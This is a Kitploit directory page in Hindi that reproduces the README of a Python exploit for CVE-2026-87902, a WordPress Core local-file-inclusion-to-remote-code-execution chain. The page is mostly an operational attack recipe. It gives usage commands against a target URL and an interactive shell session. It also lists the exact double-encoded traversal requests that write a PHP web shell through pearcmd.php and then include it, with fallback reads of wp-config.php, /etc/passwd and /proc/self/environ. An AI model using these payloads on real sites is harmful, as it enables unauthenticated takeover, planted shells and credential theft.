Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2026-87902 — CVE-2026-87902 के लिए Python exploit, जो एक WordPress Core LFI-to-RCE चेन है। यह वर्ज़न फिंगरप्रिंट करता है, pearcmd के माध्यम से PHP shell लिखता है, और command execution या LFI fallback प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/zyphorixofficialmain-lab/cve-2026-87902
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापोस्ट-शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubzyphorixofficialmain-lab/cve-2026-87902

cve-2026-87902

CVE-2026-87902 के लिए Python exploit, जो एक WordPress Core LFI-to-RCE चेन है। यह वर्ज़न फिंगरप्रिंट करता है, pearcmd के माध्यम से PHP shell लिखता है, और command execution या LFI fallback प्रदान करता है।

रिपॉजिटरी देखें
413घं 53मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

cve-2026-87902

CVE-2026-87902 – WordPress Core LFI से RCE एक्सप्लॉइट (ऑटो-फोर्सिंग संस्करण)

निर्माता: alfaris

⚠️ कानूनी चेतावनी उन सिस्टमों के विरुद्ध इसका उपयोग करना जिनके आप स्वामी नहीं हैं या जिनका परीक्षण करने की आपके पास लिखित अनुमति नहीं है, अवैध है और साइबर अपराध कानूनों के अंतर्गत दंडनीय है। लेखक दुरुपयोग की कोई जिम्मेदारी नहीं लेता।


📌 भेद्यता सारांश

फ़ील्डमान
CVECVE-2026-87902
प्रकारलोकल फ़ाइल इन्क्लूज़न (LFI) → रिमोट कोड एक्ज़ीक्यूशन (RCE)
CWECWE-98
CVSS v3.19.2 (गंभीर)
हमला वेक्टरनेटवर्क (अनॉथेंटिकेटेड)
प्रभावितWordPress 4.7.0 – 7.1.1
पैच किया गयाWordPress 7.1.2 (और 4.7.37 तक बैकपोर्ट्स)
मूल कारणget_page_template() pagename पैरामीटर को URL-डिकोड करने के बाद validate_file() को कॉल नहीं करता, जिससे डबल-एन्कोडेड ट्रैवर्सल (%252E%252E%252F) सैनिटाइज़ेशन को बायपास कर सकता है और थीम डायरेक्टरी के बाहर मनमानी .php फ़ाइलों को शामिल कर सकता है।

RCE पूर्वापेक्षाएँ

पूर्ण RCE के लिए, निम्नलिखित सभी सत्य होने चाहिए:

  1. WordPress संस्करण 4.7.0 और 7.1.1 के बीच
  2. सक्रिय थीम में एक टॉप-लेवल page-* डायरेक्टरी हो (जैसे page-templates/)
  3. कम से कम एक प्रकाशित पृष्ठ मौजूद हो
  4. pearcmd.php मौजूद हो और वेब सर्वर उपयोगकर्ता द्वारा पठनीय हो (आधिकारिक PHP Docker इमेज और PHP < 8.5 वाले कई cPanel इंस्टॉल में डिफ़ॉल्ट)
  5. PHP में register_argc_argv=On हो (PHP < 8.5 में डिफ़ॉल्ट)
  6. होस्ट OS Linux हो (Windows ट्रैवर्सल सिंटैक्स भिन्न है)

यदि इनमें से कोई भी अनुपस्थित है, तो एक्सप्लॉइट केवल-LFI फ़ाइल पठन पर वापस चला जाएगा।


📂 फ़ाइलें

exploit.py # मुख्य एक्सप्लॉइट स्क्रिप्ट README.md # यह फ़ाइल report.json # (वैकल्पिक) -o उपयोग किए जाने पर आउटपुट रिपोर्ट

⚙️ आवश्यकताएँ

  • Python 3.8+
  • requests लाइब्रेरी

इंस्टॉल करें:

root@kitploit:~
apt update
apt upgrade
apt install python
apt install git
root@kitploit:~
pip install requests
root@kitploit:~
git clone https://github.com/zyphorixofficialmain-lab/cve-2026-87902
cd cve-2026-87902
  1. बेसिक स्कैन (वर्बोज़)
root@kitploit:~
python3 exploit.py -t https://site.com -v

यह करेगा:

· WordPress संस्करण और सक्रिय थीम का फ़िंगरप्रिंट · भेद्य संस्करण रेंज की जाँच · प्रकाशित पृष्ठ ID का पता लगाना (REST → sitemap → ब्रूट फ़ोर्स) · pearcmd.php के माध्यम से PHP शेल लिखने का प्रयास · शेल को शामिल करने और id निष्पादित करने का प्रयास · यदि RCE विफल हो, तो संवेदनशील फ़ाइलों पर LFI पर वापस जाएँ

  1. एकल कमांड निष्पादित करें
root@kitploit:~
python3 exploit.py -t https://site.com -c "id"
  1. इंटरैक्टिव शेल (केवल यदि RCE सफल हुआ)
root@kitploit:~
python3 exploit.py -t https://site.com -i -v

शेल के अंदर:

root@kitploit:~
wp$ id
wp$ uname -a
wp$ cat /etc/passwd
wp$ exit
  1. रिपोर्ट को JSON में सहेजें
root@kitploit:~
python3 exploit.py -t https://site.com -o report.json -v
  1. विकल्पों को संयोजित करें
root@kitploit:~
python3 exploit.py -t https://site.com -c "whoami" -o report.json -v

🧾 CLI संदर्भ

फ़्लैग लॉन्ग विवरण -t --target आवश्यक। लक्ष्य WordPress URL (बिना ट्रेलिंग स्लैश)। -c --command RCE के बाद एकल शेल कमांड निष्पादित करें। -i --interactive RCE के बाद इंटरैक्टिव शेल खोलें। -v --verbose विस्तृत प्रगति प्रिंट करें। -o --output अंतिम रिपोर्ट को दिए गए पथ पर JSON के रूप में सहेजें। -h --help सहायता दिखाएँ।

🔄 एक्सप्लॉइट प्रवाह

root@kitploit:~
[1] फ़िंगरप्रिंट
      ├─ WordPress संस्करण (meta generator / asset ?ver=)
      └─ सक्रिय थीम (/wp-content/themes/<name>/)

[2] संस्करण जाँच
      └─ 4.7.0 – 7.1.1 ? जारी रखें : चेतावनी दें और जारी रखें

[3] पृष्ठ ID खोजें
      ├─ REST: /wp-json/wp/v2/pages
      ├─ Sitemap: /wp-sitemap.xml
      └─ ब्रूट फ़ोर्स: /?page_id=1..30

[4] page-* डायरेक्टरी जाँचें
      ├─ page-templates
      ├─ page-template
      ├─ pages
      ├─ templates
      └─ page

[5] pearcmd के माध्यम से शेल लिखें
      └─ POST /?+config-create+/&page_id=<id>&pagename=templates%252F..%252F..%252Fusr%252Flocal%252Flib%252Fphp%252Fpearcmd
         body: root=<?php system($_GET['c']); ?>

[6] शेल शामिल करें
      └─ GET /?page_id=<id>&pagename=templates%252F..%252F..%252Ftmp%252F<shell>.php&c=id

[7] फ़ॉलबैक LFI (यदि RCE विफल हो)
      ├─ /etc/passwd
      ├─ /etc/hostname
      ├─ /proc/self/environ
      ├─ /proc/version
      ├─ wp-config.php
      └─ ../.. वेरिएंट
टूल डाउनलोड करें